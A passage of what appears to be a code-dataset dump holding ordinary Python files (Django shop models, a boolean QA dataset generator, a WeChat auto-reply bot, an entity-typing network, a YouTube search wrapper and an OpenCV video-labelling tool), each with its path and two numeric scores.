product = models.ForeignKey(Product, on_delete=models.SET_NULL, null=True)
order = models.ForeignKey(Order, on_delete=models.SET_NULL, null=True)
quantity = models.IntegerField(default=0, null=True, blank=True)
date_added = models.DateTimeField(auto_now_add=True)
@property
def get_total(self):
total = self.product.price * self.quantity
return total
class ShippingAdress(models.Model):
customer = models.ForeignKey(Customer, on_delete=models.SET_NULL, null=True)
order = models.ForeignKey(Order, on_delete=models.SET_NULL, null=True)
address = models.CharField(max_length=250, null=False)
city = models.CharField(max_length=150, null=False)
state = models.CharField(max_length=150, null=False)
zipcode = models.CharField(max_length=50, null=False)
date_added = models.DateField(auto_now_add=True)
def __str__(self):
return self.address | shop/models.py | from django.db import models
from django.contrib.auth.models import User
from django import forms
class Customer(models.Model):
customer = models.OneToOneField(User, null=True, blank=True, on_delete=models.CASCADE)
fname = models.CharField(max_length=100, default="Jhon")
lname = models.CharField(max_length=100, default="Doe")
email = models.EmailField(max_length=100, default="<EMAIL>")
def __str__(self):
return self.customer.username
class Product(models.Model):
tag_choices = (
('new', 'New'),
('hot', 'hot'),
('exclusive', 'Exclusive')
)
CHOICES = (
('crystal', 'Crystal'),
('statue', 'Stone Sculpture'),
('pebble', 'Pebble')
)
name = models.CharField(max_length=60)
category = models.CharField(max_length=25, choices=CHOICES, default='Crystal')
price = models.FloatField()
description = models.TextField(null=True, blank=True )
product_image = models.ImageField(default='default_product.jpg', upload_to='products')
discounted_price = models.FloatField(default=0.0)
tag = models.CharField(max_length=10, choices=tag_choices, null=True, blank=True)
available = models.BooleanField(default=True, null=True, blank=True)
digital = models.BooleanField(default=False, null=True, blank=False)
def __str__(self):
return self.name
class Order(models.Model):
SHIPPING_CHOICES = (
('standard', 'Standard Shiping'),
('express', 'Express Delivery'),
('nextDay', 'Next Business day')
)
customer = models.ForeignKey(Customer, on_delete=models.SET_NULL, null=True, blank=True)
shipping_type = forms.ChoiceField(choices=SHIPPING_CHOICES, widget=forms.RadioSelect())
date_ordered = models.DateTimeField(auto_now_add=True)
complete = models.BooleanField(default=False)
transaction_id = models.CharField(max_length=100, null=True)
# Code block for shipping logic if there are digital items that doesn't need shipping the forms disappears.
@property
def shipping(self):
shipping = False
orderitems = self.orderitem_set.all()
for i in orderitems:
if i.product.digital == False:
shipping = True
return shipping
@property
def get_cart_total(self):
orderitems = self.orderitem_set.all()
total = sum([item.get_total for item in orderitems])
return total
@property
def get_cart_items(self):
orderitems = self.orderitem_set.all()
total = sum([item.quantity for item in orderitems])
return total
def __str__(self):
return str(self.id)
class OrderItem(models.Model):
product = models.ForeignKey(Product, on_delete=models.SET_NULL, null=True)
order = models.ForeignKey(Order, on_delete=models.SET_NULL, null=True)
quantity = models.IntegerField(default=0, null=True, blank=True)
date_added = models.DateTimeField(auto_now_add=True)
@property
def get_total(self):
total = self.product.price * self.quantity
return total
class ShippingAdress(models.Model):
customer = models.ForeignKey(Customer, on_delete=models.SET_NULL, null=True)
order = models.ForeignKey(Order, on_delete=models.SET_NULL, null=True)
address = models.CharField(max_length=250, null=False)
city = models.CharField(max_length=150, null=False)
state = models.CharField(max_length=150, null=False)
zipcode = models.CharField(max_length=50, null=False)
date_added = models.DateField(auto_now_add=True)
def __str__(self):
return self.address | 0.52074 | 0.081886 |
import pandas as pd
try:
from boolean1_neg import boolean1
except ImportError:
from contra_qa.text_generation.boolean1_neg import boolean1
try:
from boolean2_S_and import boolean2
except ImportError:
from contra_qa.text_generation.boolean2_S_and import boolean2
try:
from boolean3_NP_and import boolean3
except ImportError:
from contra_qa.text_generation.boolean3_NP_and import boolean3
try:
from boolean4_VP_and import boolean4
except ImportError:
from contra_qa.text_generation.boolean4_VP_and import boolean4
try:
from boolean5_AP_and import boolean5
except ImportError:
from contra_qa.text_generation.boolean5_AP_and import boolean5
try:
from boolean6_implicit_and import boolean6
except ImportError:
from contra_qa.text_generation.boolean6_implicit_and import boolean6
try:
from boolean7_S_or import boolean7
except ImportError:
from contra_qa.text_generation.boolean7_S_or import boolean7
try:
from boolean8_NP_or import boolean8
except ImportError:
from contra_qa.text_generation.boolean8_NP_or import boolean8
try:
from boolean9_VP_or import boolean9
except ImportError:
from contra_qa.text_generation.boolean9_VP_or import boolean9
try:
from boolean10_AP_or import boolean10
except ImportError:
from contra_qa.text_generation.boolean10_AP_or import boolean10
def create_all():
boolean1()
boolean2()
boolean3()
boolean4()
boolean5()
boolean6()
boolean7()
boolean8()
boolean9()
boolean10()
# creating the AND dataset
df2_tr = pd.read_csv("data/boolean2_train.csv")
df3_tr = pd.read_csv("data/boolean3_train.csv")
df4_tr = pd.read_csv("data/boolean4_train.csv")
df5_tr = pd.read_csv("data/boolean5_train.csv")
df6_tr = pd.read_csv("data/boolean6_train.csv")
df2_te = pd.read_csv("data/boolean2_test.csv")
df3_te = pd.read_csv("data/boolean3_test.csv")
df4_te = pd.read_csv("data/boolean4_test.csv")
df5_te = pd.read_csv("data/boolean5_test.csv")
df6_te = pd.read_csv("data/boolean6_test.csv")
train_and = [df2_tr, df3_tr, df4_tr, df5_tr, df6_tr]
test_and = [df2_te, df3_te, df4_te, df5_te, df6_te]
df_train_and = pd.concat(train_and)
df_test_and = pd.concat(test_and)
df_train_and = df_train_and.sample(frac=1).reset_index(drop=True)
df_test_and = df_test_and.sample(frac=1).reset_index(drop=True)
df_train_and = df_train_and.iloc[:10000]
df_test_and = df_test_and.iloc[:1000]
df_train_and.to_csv("data/boolean_AND_train.csv", index=False)
df_test_and.to_csv("data/boolean_AND_test.csv", index=False)
# creating the OR dataset
df7_tr = pd.read_csv("data/boolean7_train.csv")
df8_tr = pd.read_csv("data/boolean8_train.csv")
df9_tr = pd.read_csv("data/boolean9_train.csv")
df10_tr = pd.read_csv("data/boolean10_train.csv")
df7_te = pd.read_csv("data/boolean7_test.csv")
df8_te = pd.read_csv("data/boolean8_test.csv")
df9_te = pd.read_csv("data/boolean9_test.csv")
df10_te = pd.read_csv("data/boolean10_test.csv")
train_or = [df7_tr, df8_tr, df9_tr, df10_tr]
test_or = [df7_te, df8_te, df9_te, df10_te]
df_train_or = pd.concat(train_or)
df_test_or = pd.concat(test_or)
df_train_or = df_train_or.sample(frac=1).reset_index(drop=True)
df_test_or = df_test_or.sample(frac=1).reset_index(drop=True)
df_train_or = df_train_or.iloc[:10000]
df_test_or = df_test_or.iloc[:1000]
df_train_or.to_csv("data/boolean_OR_train.csv", index=False)
df_test_or.to_csv("data/boolean_OR_test.csv", index=False)
# creating the boolean dataset
boolean_train = [df_train_and, df_train_or]
boolean_test = [df_test_and, df_test_or]
df_boolean_train = pd.concat(boolean_train)
df_boolean_test = pd.concat(boolean_test)
df_boolean_train = df_boolean_train.sample(frac=1).reset_index(drop=True)
df_boolean_test = df_boolean_test.sample(frac=1).reset_index(drop=True)
df_boolean_train = df_boolean_train.iloc[:10000]
df_boolean_test = df_boolean_test.iloc[:1000]
df_boolean_train.to_csv("data/boolean_train.csv", index=False)
df_boolean_test.to_csv("data/boolean_test.csv", index=False)
if __name__ == '__main__':
create_all() | contra_qa/text_generation/boolean_data_gen.py | import pandas as pd
try:
from boolean1_neg import boolean1
except ImportError:
from contra_qa.text_generation.boolean1_neg import boolean1
try:
from boolean2_S_and import boolean2
except ImportError:
from contra_qa.text_generation.boolean2_S_and import boolean2
try:
from boolean3_NP_and import boolean3
except ImportError:
from contra_qa.text_generation.boolean3_NP_and import boolean3
try:
from boolean4_VP_and import boolean4
except ImportError:
from contra_qa.text_generation.boolean4_VP_and import boolean4
try:
from boolean5_AP_and import boolean5
except ImportError:
from contra_qa.text_generation.boolean5_AP_and import boolean5
try:
from boolean6_implicit_and import boolean6
except ImportError:
from contra_qa.text_generation.boolean6_implicit_and import boolean6
try:
from boolean7_S_or import boolean7
except ImportError:
from contra_qa.text_generation.boolean7_S_or import boolean7
try:
from boolean8_NP_or import boolean8
except ImportError:
from contra_qa.text_generation.boolean8_NP_or import boolean8
try:
from boolean9_VP_or import boolean9
except ImportError:
from contra_qa.text_generation.boolean9_VP_or import boolean9
try:
from boolean10_AP_or import boolean10
except ImportError:
from contra_qa.text_generation.boolean10_AP_or import boolean10
def create_all():
boolean1()
boolean2()
boolean3()
boolean4()
boolean5()
boolean6()
boolean7()
boolean8()
boolean9()
boolean10()
# creating the AND dataset
df2_tr = pd.read_csv("data/boolean2_train.csv")
df3_tr = pd.read_csv("data/boolean3_train.csv")
df4_tr = pd.read_csv("data/boolean4_train.csv")
df5_tr = pd.read_csv("data/boolean5_train.csv")
df6_tr = pd.read_csv("data/boolean6_train.csv")
df2_te = pd.read_csv("data/boolean2_test.csv")
df3_te = pd.read_csv("data/boolean3_test.csv")
df4_te = pd.read_csv("data/boolean4_test.csv")
df5_te = pd.read_csv("data/boolean5_test.csv")
df6_te = pd.read_csv("data/boolean6_test.csv")
train_and = [df2_tr, df3_tr, df4_tr, df5_tr, df6_tr]
test_and = [df2_te, df3_te, df4_te, df5_te, df6_te]
df_train_and = pd.concat(train_and)
df_test_and = pd.concat(test_and)
df_train_and = df_train_and.sample(frac=1).reset_index(drop=True)
df_test_and = df_test_and.sample(frac=1).reset_index(drop=True)
df_train_and = df_train_and.iloc[:10000]
df_test_and = df_test_and.iloc[:1000]
df_train_and.to_csv("data/boolean_AND_train.csv", index=False)
df_test_and.to_csv("data/boolean_AND_test.csv", index=False)
# creating the OR dataset
df7_tr = pd.read_csv("data/boolean7_train.csv")
df8_tr = pd.read_csv("data/boolean8_train.csv")
df9_tr = pd.read_csv("data/boolean9_train.csv")
df10_tr = pd.read_csv("data/boolean10_train.csv")
df7_te = pd.read_csv("data/boolean7_test.csv")
df8_te = pd.read_csv("data/boolean8_test.csv")
df9_te = pd.read_csv("data/boolean9_test.csv")
df10_te = pd.read_csv("data/boolean10_test.csv")
train_or = [df7_tr, df8_tr, df9_tr, df10_tr]
test_or = [df7_te, df8_te, df9_te, df10_te]
df_train_or = pd.concat(train_or)
df_test_or = pd.concat(test_or)
df_train_or = df_train_or.sample(frac=1).reset_index(drop=True)
df_test_or = df_test_or.sample(frac=1).reset_index(drop=True)
df_train_or = df_train_or.iloc[:10000]
df_test_or = df_test_or.iloc[:1000]
df_train_or.to_csv("data/boolean_OR_train.csv", index=False)
df_test_or.to_csv("data/boolean_OR_test.csv", index=False)
# creating the boolean dataset
boolean_train = [df_train_and, df_train_or]
boolean_test = [df_test_and, df_test_or]
df_boolean_train = pd.concat(boolean_train)
df_boolean_test = pd.concat(boolean_test)
df_boolean_train = df_boolean_train.sample(frac=1).reset_index(drop=True)
df_boolean_test = df_boolean_test.sample(frac=1).reset_index(drop=True)
df_boolean_train = df_boolean_train.iloc[:10000]
df_boolean_test = df_boolean_test.iloc[:1000]
df_boolean_train.to_csv("data/boolean_train.csv", index=False)
df_boolean_test.to_csv("data/boolean_test.csv", index=False)
if __name__ == '__main__':
create_all() | 0.465145 | 0.267121 |
import logging
import itchat
import robot
import log
from config import friend_wechat_remarknames,reply_msg_from_myself
logger = logging.getLogger('MyItChatDemo')
reply_friends = []
@itchat.msg_register(itchat.content.TEXT)
def msg_reply(msg):
print(msg)
content = msg['Text']
from_user_name = msg['FromUserName']
from_user_remarkname = msg['User']['RemarkName']
logger.info('receive text : {content} from remarkName:{FromUserRemarkName} to userName:{username} '
.format(content=content,FromUserRemarkName=from_user_remarkname,username=from_user_name))
try:
reply_content = robot.get_reply_msg(content, from_user_name)
except Exception as e:
logger.error('get reply from robot failed: %s' % e)
return
if is_auto_replay(from_user_name) :
logger.info('reply {content} to remarkName:{FromUserRemarkName} userName:{username} '
.format(content=reply_content,FromUserRemarkName=from_user_remarkname,username=from_user_name))
return reply_content
@itchat.msg_register(itchat.content.PICTURE)
def msg_reply(msg):
from_user_name = msg['FromUserName']
from_user_remarkname = msg['User']['RemarkName']
logger.info('receive unsupported content from remarkName:{FromUserRemarkName} from userName:{username} '
.format(FromUserRemarkName=from_user_remarkname, username=from_user_name))
if is_auto_replay(from_user_name):
return '好好聊天,不要发表情、语音……'
def is_auto_replay(from_user_name):
return from_user_name in reply_friends
def get_username_with_remarknames(friend_wechat_remarknames):
for remarkname in friend_wechat_remarknames:
friends = itchat.search_friends(remarkName=remarkname)
for friend in friends:
reply_friends.append(friend['UserName'])
def main():
log.set_logging(loggingLevel=logging.INFO)
itchat.auto_login(hotReload=True)
user_info = itchat.search_friends()
get_username_with_remarknames(friend_wechat_remarknames)
logger.info('login success userInfo:{user_info}'.format(user_info=user_info))
if reply_msg_from_myself:
reply_friends.append(user_info['UserName'])
itchat.run()
if __name__ == "__main__":
main() | ChatRobot_Demo/startup.py | import logging
import itchat
import robot
import log
from config import friend_wechat_remarknames,reply_msg_from_myself
logger = logging.getLogger('MyItChatDemo')
reply_friends = []
@itchat.msg_register(itchat.content.TEXT)
def msg_reply(msg):
print(msg)
content = msg['Text']
from_user_name = msg['FromUserName']
from_user_remarkname = msg['User']['RemarkName']
logger.info('receive text : {content} from remarkName:{FromUserRemarkName} to userName:{username} '
.format(content=content,FromUserRemarkName=from_user_remarkname,username=from_user_name))
try:
reply_content = robot.get_reply_msg(content, from_user_name)
except Exception as e:
logger.error('get reply from robot failed: %s' % e)
return
if is_auto_replay(from_user_name) :
logger.info('reply {content} to remarkName:{FromUserRemarkName} userName:{username} '
.format(content=reply_content,FromUserRemarkName=from_user_remarkname,username=from_user_name))
return reply_content
@itchat.msg_register(itchat.content.PICTURE)
def msg_reply(msg):
from_user_name = msg['FromUserName']
from_user_remarkname = msg['User']['RemarkName']
logger.info('receive unsupported content from remarkName:{FromUserRemarkName} from userName:{username} '
.format(FromUserRemarkName=from_user_remarkname, username=from_user_name))
if is_auto_replay(from_user_name):
return '好好聊天,不要发表情、语音……'
def is_auto_replay(from_user_name):
return from_user_name in reply_friends
def get_username_with_remarknames(friend_wechat_remarknames):
for remarkname in friend_wechat_remarknames:
friends = itchat.search_friends(remarkName=remarkname)
for friend in friends:
reply_friends.append(friend['UserName'])
def main():
log.set_logging(loggingLevel=logging.INFO)
itchat.auto_login(hotReload=True)
user_info = itchat.search_friends()
get_username_with_remarknames(friend_wechat_remarknames)
logger.info('login success userInfo:{user_info}'.format(user_info=user_info))
if reply_msg_from_myself:
reply_friends.append(user_info['UserName'])
itchat.run()
if __name__ == "__main__":
main() | 0.139866 | 0.045395 |
from pytorch_lightning.core.lightning import LightningModule
from entity_typing_framework.utils.implemented_classes_lvl1 import IMPLEMENTED_CLASSES_LVL1
import torch
class BaseEntityTypingNetwork(LightningModule):
'''
Basic :ref:`EntityTypingNetwork <EntityTypingNetwork>`. This module is able to use the following submodules:
:ref:`encoder <encoder>`:
:ref:`entity_typing_framework.EntityTypingNetwork_classes.input_encoders.DistilBERTEncoder <DistilBERTEncoder>`
:ref:`entity_typing_framework.EntityTypingNetwork_classes.input_encoders.AdapterDistilBERTEncoder <AdapterDistilBERTEncoder>`
:ref:`type_encoder <type_encoder>`:
:ref:`entity_typing_framework.EntityTypingNetwork_classes.type_encoders.OneHotTypeEncoder <OneHotTypeEncoder>`
:ref:`input_projector <input_projector>`:
:ref:`entity_typing_framework.EntityTypingNetwork_classes.type_encoders.Classifier <Classifier>`
Parameters:
name:
the name of the module, specified in the :code:`yaml` configuration file under the key :code:`model.ET_Network_params.name`. Has to be declared in the :doc:`module_dictionary`
network_params:
parameters for the module and for the submodules, specified in the :code:`yaml` configuration file under the key :code:`model.ET_Network_params.network_params`
expected keys in network_params are: :code:`model.ET_Network_params.network_params.encoder_params`, :code:`model.ET_Network_params.network_params.type_encoder_params`, and :code:`model.ET_Network_params.network_params.input_projector_params`
type_number:
number of types for this run. Automatic managed through :ref:`DatasetManager <DatasetManager>`
'''
def __init__(self, name, network_params, type_number
# , encoder_params, type_encoder_params,
# inference_params, metric_manager_params, loss_params,
):
super().__init__()
encoder_params = network_params['encoder_params']
self.encoder = IMPLEMENTED_CLASSES_LVL1[encoder_params['name']](**encoder_params)
type_encoder_params = network_params['type_encoder_params']
self.type_encoder = IMPLEMENTED_CLASSES_LVL1[type_encoder_params['name']](type_number=type_number, **type_encoder_params)
input_projector_params = network_params['input_projector_params']
self.input_projector = IMPLEMENTED_CLASSES_LVL1[input_projector_params['name']](type_number=type_number,
input_dim = self.encoder.get_representation_dim(),
**input_projector_params)
def forward(self, batch):
'''
override of :code:pytorch_lightning.LightningModule.forward (`ref <https://pytorch-lightning.readthedocs.io/en/stable/extensions/datamodules.html>`_)
parameters:
batch:
the batch returned by the :ref:`Dataset <dataset>`
return:
projected_input:
output of the :ref:`input_projector <input_projector>`. Commonly the :ref:`input_projector <input_projector>` takes in input the output of the :ref:`encoder <encoder>`
encoded_types:
output of the :ref:`type_encoder <type_encoder>`.
'''
batched_sentences, batched_attn_masks, batched_labels = batch
encoded_input = self.encoder(batched_sentences, batched_attn_masks)
projected_input = self.input_projector(encoded_input)
encoded_types = self.type_encoder(batched_labels)
return projected_input, encoded_types
def load_from_checkpoint(self, checkpoint_to_load, strict, **kwargs):
state_dict = torch.load(checkpoint_to_load)
new_state_dict = {k.replace('ET_Network.', ''): v for k, v in state_dict['state_dict'].items()}
self.load_state_dict(new_state_dict, strict=strict)
return self
class EntityTypingNetworkForIncrementalTraining(BaseEntityTypingNetwork):
def setup_incremental_training(self, new_type_number, network_params):
input_projector_params = network_params['input_projector_params']
## extract last classifier layer and manually insert the out_features number
single_layers = sorted(input_projector_params['layers_parameters'].items())
single_layers[-1][1]['out_features'] = new_type_number
input_projector_params['layers_parameters'] = {k: v for k, v in single_layers}
self.freeze()
self.additional_input_projector = IMPLEMENTED_CLASSES_LVL1[input_projector_params['name']](type_number=new_type_number,
input_dim = self.encoder.get_representation_dim(),
**input_projector_params)
def forward(self, batch):
batched_sentences, batched_attn_masks, batched_labels = batch
encoded_input = self.encoder(batched_sentences, batched_attn_masks)
projected_input = self.input_projector(encoded_input)
additional_projected_input = self.additional_input_projector(encoded_input)
network_output = torch.concat((projected_input, additional_projected_input), dim = 1)
encoded_types = self.type_encoder(batched_labels)
return network_output, encoded_types | entity_typing_framework/EntityTypingNetwork_classes/base_network.py | from pytorch_lightning.core.lightning import LightningModule
from entity_typing_framework.utils.implemented_classes_lvl1 import IMPLEMENTED_CLASSES_LVL1
import torch
class BaseEntityTypingNetwork(LightningModule):
'''
Basic :ref:`EntityTypingNetwork <EntityTypingNetwork>`. This module is able to use the following submodules:
:ref:`encoder <encoder>`:
:ref:`entity_typing_framework.EntityTypingNetwork_classes.input_encoders.DistilBERTEncoder <DistilBERTEncoder>`
:ref:`entity_typing_framework.EntityTypingNetwork_classes.input_encoders.AdapterDistilBERTEncoder <AdapterDistilBERTEncoder>`
:ref:`type_encoder <type_encoder>`:
:ref:`entity_typing_framework.EntityTypingNetwork_classes.type_encoders.OneHotTypeEncoder <OneHotTypeEncoder>`
:ref:`input_projector <input_projector>`:
:ref:`entity_typing_framework.EntityTypingNetwork_classes.type_encoders.Classifier <Classifier>`
Parameters:
name:
the name of the module, specified in the :code:`yaml` configuration file under the key :code:`model.ET_Network_params.name`. Has to be declared in the :doc:`module_dictionary`
network_params:
parameters for the module and for the submodules, specified in the :code:`yaml` configuration file under the key :code:`model.ET_Network_params.network_params`
expected keys in network_params are: :code:`model.ET_Network_params.network_params.encoder_params`, :code:`model.ET_Network_params.network_params.type_encoder_params`, and :code:`model.ET_Network_params.network_params.input_projector_params`
type_number:
number of types for this run. Automatic managed through :ref:`DatasetManager <DatasetManager>`
'''
def __init__(self, name, network_params, type_number
# , encoder_params, type_encoder_params,
# inference_params, metric_manager_params, loss_params,
):
super().__init__()
encoder_params = network_params['encoder_params']
self.encoder = IMPLEMENTED_CLASSES_LVL1[encoder_params['name']](**encoder_params)
type_encoder_params = network_params['type_encoder_params']
self.type_encoder = IMPLEMENTED_CLASSES_LVL1[type_encoder_params['name']](type_number=type_number, **type_encoder_params)
input_projector_params = network_params['input_projector_params']
self.input_projector = IMPLEMENTED_CLASSES_LVL1[input_projector_params['name']](type_number=type_number,
input_dim = self.encoder.get_representation_dim(),
**input_projector_params)
def forward(self, batch):
'''
override of :code:pytorch_lightning.LightningModule.forward (`ref <https://pytorch-lightning.readthedocs.io/en/stable/extensions/datamodules.html>`_)
parameters:
batch:
the batch returned by the :ref:`Dataset <dataset>`
return:
projected_input:
output of the :ref:`input_projector <input_projector>`. Commonly the :ref:`input_projector <input_projector>` takes in input the output of the :ref:`encoder <encoder>`
encoded_types:
output of the :ref:`type_encoder <type_encoder>`.
'''
batched_sentences, batched_attn_masks, batched_labels = batch
encoded_input = self.encoder(batched_sentences, batched_attn_masks)
projected_input = self.input_projector(encoded_input)
encoded_types = self.type_encoder(batched_labels)
return projected_input, encoded_types
def load_from_checkpoint(self, checkpoint_to_load, strict, **kwargs):
state_dict = torch.load(checkpoint_to_load)
new_state_dict = {k.replace('ET_Network.', ''): v for k, v in state_dict['state_dict'].items()}
self.load_state_dict(new_state_dict, strict=strict)
return self
class EntityTypingNetworkForIncrementalTraining(BaseEntityTypingNetwork):
def setup_incremental_training(self, new_type_number, network_params):
input_projector_params = network_params['input_projector_params']
## extract last classifier layer and manually insert the out_features number
single_layers = sorted(input_projector_params['layers_parameters'].items())
single_layers[-1][1]['out_features'] = new_type_number
input_projector_params['layers_parameters'] = {k: v for k, v in single_layers}
self.freeze()
self.additional_input_projector = IMPLEMENTED_CLASSES_LVL1[input_projector_params['name']](type_number=new_type_number,
input_dim = self.encoder.get_representation_dim(),
**input_projector_params)
def forward(self, batch):
batched_sentences, batched_attn_masks, batched_labels = batch
encoded_input = self.encoder(batched_sentences, batched_attn_masks)
projected_input = self.input_projector(encoded_input)
additional_projected_input = self.additional_input_projector(encoded_input)
network_output = torch.concat((projected_input, additional_projected_input), dim = 1)
encoded_types = self.type_encoder(batched_labels)
return network_output, encoded_types | 0.897505 | 0.466785 |
from typing import Literal
from ..resources.SearchResultResources import SearchListResponse
from googleapiclient.discovery import Resource
class Search:
def __init__(self, client: Resource) -> None:
self.client: Resource = client
# That's a lot of parameters!
# With the amount of params this has, and the fact that I don't have a proper testing mechanism
# and the fact that this uses a _lot_ of quota per call and I have the free tier of quota
# means that a lot of the params here isn't gonna be tested. So yeah...
def list(self, *, q: str = None,
for_content_owner: bool = None, for_developer: bool = None, for_mine: bool = None, related_to_video_id: str = None,
order: Literal['date', 'rating', 'relevance', 'title', 'videoCount', 'viewCount'] = None,
safe_search: Literal['none', 'moderate', 'strict'] = None,
type: Literal['channel', 'playlist', 'video'] = None, topic_id: str = None,
published_after: str = None, published_before: str = None,
region_code: str = None, relevance_language: str = None,
location: str = None, location_radius: str = None,
channel_id: str = None, channel_type: Literal['show'] = None, event_type: Literal['completed', 'live', 'upcoming'] = None,
video_caption: Literal['closedCaption', 'none'] = None, video_category_id: str = None,
video_definition: Literal['high', 'standard'] = None,
video_dimension: Literal['2d', '3d'] = None,
video_duration: Literal['long', 'medium', 'short'] = None,
video_embeddable: Literal['true'] = None, video_license: Literal['creativeCommon', 'youtube'] = None,
video_syndicated: Literal['true'] = None, video_type: Literal['episode', 'movie'] = None,
max_results: int = None, page_token: str = None, on_behalf_of_content_owner: str = None
):
"""
Returns a collection of search results that match the query parameters specified in the API request.
"""
res = self.client.search().list(
part='snippet',
forContentOwner=for_content_owner, forDeveloper=for_developer, forMine=for_mine, relatedToVideoId=related_to_video_id,
channelId=channel_id, channelType=channel_type, eventType=event_type,
location=location, locationRadius=location_radius, maxResults=max_results,
onBehalfOfContentOwner=on_behalf_of_content_owner, order=order, pageToken=page_token,
publishedAfter=published_after, publishedBefore=published_before, q=q,
regionCode=region_code, relevanceLanguage=relevance_language, safeSearch=safe_search,
topicId=topic_id, type=type,
videoCaption=video_caption, videoCategoryId=video_category_id, videoDefinition=video_definition,
videoDimension=video_dimension, videoDuration=video_duration, videoEmbeddable=video_embeddable,
videoLicense=video_license, videoSyndicated=video_syndicated, videoType=video_type
).execute()
return SearchListResponse._from_response_dict(res) | src/ytwrapper/apis/Searches.py | from typing import Literal
from ..resources.SearchResultResources import SearchListResponse
from googleapiclient.discovery import Resource
class Search:
def __init__(self, client: Resource) -> None:
self.client: Resource = client
# That's a lot of parameters!
# With the amount of params this has, and the fact that I don't have a proper testing mechanism
# and the fact that this uses a _lot_ of quota per call and I have the free tier of quota
# means that a lot of the params here isn't gonna be tested. So yeah...
def list(self, *, q: str = None,
for_content_owner: bool = None, for_developer: bool = None, for_mine: bool = None, related_to_video_id: str = None,
order: Literal['date', 'rating', 'relevance', 'title', 'videoCount', 'viewCount'] = None,
safe_search: Literal['none', 'moderate', 'strict'] = None,
type: Literal['channel', 'playlist', 'video'] = None, topic_id: str = None,
published_after: str = None, published_before: str = None,
region_code: str = None, relevance_language: str = None,
location: str = None, location_radius: str = None,
channel_id: str = None, channel_type: Literal['show'] = None, event_type: Literal['completed', 'live', 'upcoming'] = None,
video_caption: Literal['closedCaption', 'none'] = None, video_category_id: str = None,
video_definition: Literal['high', 'standard'] = None,
video_dimension: Literal['2d', '3d'] = None,
video_duration: Literal['long', 'medium', 'short'] = None,
video_embeddable: Literal['true'] = None, video_license: Literal['creativeCommon', 'youtube'] = None,
video_syndicated: Literal['true'] = None, video_type: Literal['episode', 'movie'] = None,
max_results: int = None, page_token: str = None, on_behalf_of_content_owner: str = None
):
"""
Returns a collection of search results that match the query parameters specified in the API request.
"""
res = self.client.search().list(
part='snippet',
forContentOwner=for_content_owner, forDeveloper=for_developer, forMine=for_mine, relatedToVideoId=related_to_video_id,
channelId=channel_id, channelType=channel_type, eventType=event_type,
location=location, locationRadius=location_radius, maxResults=max_results,
onBehalfOfContentOwner=on_behalf_of_content_owner, order=order, pageToken=page_token,
publishedAfter=published_after, publishedBefore=published_before, q=q,
regionCode=region_code, relevanceLanguage=relevance_language, safeSearch=safe_search,
topicId=topic_id, type=type,
videoCaption=video_caption, videoCategoryId=video_category_id, videoDefinition=video_definition,
videoDimension=video_dimension, videoDuration=video_duration, videoEmbeddable=video_embeddable,
videoLicense=video_license, videoSyndicated=video_syndicated, videoType=video_type
).execute()
return SearchListResponse._from_response_dict(res) | 0.562657 | 0.194215 |
from imutils.video import FPS
import imutils
import os
import cv2
import shutil
import time
import show_option_trafic_sign
import define
def on_pos_video_trackbar(val):
global vs, frame_index
if val != frame_index:
frame_index = val
vs.set(cv2.CAP_PROP_POS_FRAMES, frame_index)
print("Set Pos : ", val)
# function called by trackbar, sets the speed of playback
def setSpeed(val):
global playSpeed
playSpeed = max(val, 1)
def mouse_callback(event, x, y, flags, param):
global mouse_down
global step
if event == cv2.EVENT_LBUTTONDOWN:
if mouse_down is False:
mouse_down = True
step = 0
else:
step += 1
elif event == cv2.EVENT_LBUTTONUP and mouse_down:
mouse_down = False
main_title_window = "Video"
frame_index = 0
playSpeed = 250
mouse_down = False
step = 0
path_video = define.path_video
path_save_data = define.path_save_data
name_video = define.name_video
vs = cv2.VideoCapture(path_video)
if vs.isOpened() is False:
print("Open video false")
exit()
num_of_frame = int(vs.get(cv2.CAP_PROP_FRAME_COUNT))
pos_slider_max = num_of_frame
cv2.namedWindow(main_title_window, cv2.WINDOW_AUTOSIZE)
cv2.setMouseCallback(main_title_window, mouse_callback)
cv2.createTrackbar('Position', main_title_window, 0, pos_slider_max, on_pos_video_trackbar)
cv2.createTrackbar("Speed", "Video", playSpeed, 500, setSpeed)
def main():
global frame_index
global step
# Initial tracker video
tracker_type = "csrt" # csrt
OPENCV_OBJECT_TRACKERS = {
"csrt": cv2.TrackerCSRT_create, # higher object tracking accuracy and can tolerate slower FPS throughput
"kcf": cv2.TrackerKCF_create, # faster FPS throughput but can handle slightly lower object tracking accuracy
"boosting": cv2.TrackerBoosting_create,
"mil": cv2.TrackerMIL_create,
"tld": cv2.TrackerTLD_create,
"medianflow": cv2.TrackerMedianFlow_create,
"mosse": cv2.TrackerMOSSE_create
}
tracker = OPENCV_OBJECT_TRACKERS[tracker_type]()
# initialize the bounding box coordinates of the object we are going
# to track
initBB = None
fps = None
start = True
view_left = False
view_right = False
# loop for choice view left or right
ret, frame_ori = vs.read()
print("Please press r(R) to view right window or e(E) to view left side window!")
while start:
view_frame = imutils.resize(frame_ori, width=1000)
text = 'Please press r(R) to view right window or e(E) to view left side window!'
(H, W) = view_frame.shape[:2]
cv2.putText(view_frame, text, (10, H - 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
cv2.imshow(main_title_window, view_frame)
key = cv2.waitKey(playSpeed) & 0xFF
if key == ord("e") or key == ord("E"):
folder_image = path_save_data + '/image_left/'
folder_label = path_save_data + '/label_left/'
if os.path.exists(folder_image) and os.path.exists(folder_label):
shutil.rmtree(folder_image)
shutil.rmtree(folder_label)
if not os.path.exists(folder_image):
os.makedirs(folder_image)
if not os.path.exists(folder_label):
os.makedirs(folder_label)
start = False
view_left = True
elif key == ord("r") or key == ord("R"):
folder_image = path_save_data + '/image_right/'
folder_label = path_save_data + '/label_right/'
if os.path.exists(folder_image) and os.path.exists(folder_label):
shutil.rmtree(folder_image)
shutil.rmtree(folder_label)
if not os.path.exists(folder_image):
os.makedirs(folder_image)
if not os.path.exists(folder_label):
os.makedirs(folder_label)
start = False
view_right = True
# loop over frames from the video stream
while True:
vs.set(cv2.CAP_PROP_POS_FRAMES, frame_index)
ret, frame_ori = vs.read()
(H_ori, W_ori) = frame_ori.shape[:2]
if view_left:
x_max_show = 1850
y_max_show = 900
x_min_show = 0
y_min_show = 0
frame = frame_ori[:int(H_ori), :int(W_ori / 2)]
elif view_right:
x_max_show = 3800
y_max_show = 900
x_min_show = 1920
y_min_show = 0
frame = frame_ori[:int(H_ori), int(W_ori / 2):]
view_frame = frame_ori[y_min_show:y_max_show, x_min_show:x_max_show]
frame_index += 1
